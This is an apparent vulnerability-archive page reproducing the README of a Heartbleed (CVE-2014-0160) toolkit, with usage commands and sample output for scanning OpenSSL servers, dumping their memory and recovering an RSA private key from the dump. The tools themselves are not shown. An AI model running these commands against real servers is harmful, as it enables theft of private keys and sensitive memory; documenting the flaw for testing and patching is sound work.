Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2014-0160 PoC — OpenSSL 缓冲区错误漏洞

Source
https://github.com/einaros/heartbleed-tools
Associated Vulnerability
Title:OpenSSL 缓冲区错误漏洞 (CVE-2014-0160)
Description:The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
Description
OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.
Readme
## OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.

Author: Einar Otto Stangvik / @einaros / https://hacking.ventures

Since the cat is long since out of the bag, and others have begun publishing their tools,
I'm putting mine out there too. Hopefully this amplifies the pressure on those that still
haven't patched or upgraded their severs. Others may find the tools of educational value.

Unlike many other Heartbleed PoCs, this tool will supply most possible ciphers in the initial
ClientHello packet. Whatever cipher the server picks will be used for all subsequent ClientHello
packets in a dump session. That should ensure proper vulnerability detection, as well as
decrease overhead once a cipher has been found.

Use these tools as you please, but do us all a favor: Solve problems instead of creating them.

Inspired by the work and publications of:
- Jared Stafford
- Jeremi M Gosney
- Ben M Murphy 
- ... and many others.

### Usage:

Here seen recovering one of the RSA primes of the CloudFlare challenge 34 times in one minute. That equals getting the full private key 34 times in one minute.
![img](https://i.imgur.com/zfEBObE.png)

```
# Test vulnerability using unobtrusive mode
# This will request N bytes, but supply N-1 itself, so that the server will
# only actually bleed a single byte if vulnerable. Suggested N is 16360 in this
# case, since that will result in a single TLS record: 
# 3 + 2 + 1 + 2 + 16360 + 16 bytes = 0xFFFF.

$ ./hb.py -u -n 16360 -p 443 www.example.int
www.example.int:443 is vulnerable

# Dupm data from CloudFlare's old challenge server

$ ./hb.py -p 443 www.cloudflarechallenge.com -n 0xF000 -l 100 -t 50 -d -o cloudflare-dump.bin
[2014/04/14 10:55:48] Incoming data rate: 85877 kbps
... runs for a while

# Look for prime in the dump

$ ./keyscan.py cloudflare.crt cloudflare-dump.bin
Key size: 128
Data length: 173476834
cloudflare-dump.bin Offset 0xf155ec: p = 13827796798740740191625032142481917804987720337701...

# Extract key once found

$ ./keyscan.py cloudflare.crt cloudflare-dump.bin 0xf155ec
Prime should be at offset: f155ec
Key size: 128

Hexdump of surrounding data:
f151ec: D0 00 00 00 00 00 00 00 00 00 00 00 00 00 30 C0  ..............0.
f151fc: 3C 01 00 00 00 00 00 00 00 00 00 00 00 00 90 8B  <...............
f1520c: D0 00 00 00 00 00 02 00 C3 A3 4D 08 48 47 00 00  ..........M.HG..
...

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAm0AWkVnDx5feOctdC97Ztgvtd25uKKmhjCHpLycmExe1RiRSl/hGIL7f8Fg/
qiUztVm5uXZJ1UG7dzz+9OtTNh+v27BtzPsU3yivHevwAB1mTMtP6bPuXBjzsxRcC9yVcBBWpKBM
...
```

### License

The author can't and won't hold any right to any part of this package. It's based on open ideas,
and shall remain open for all he cares.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →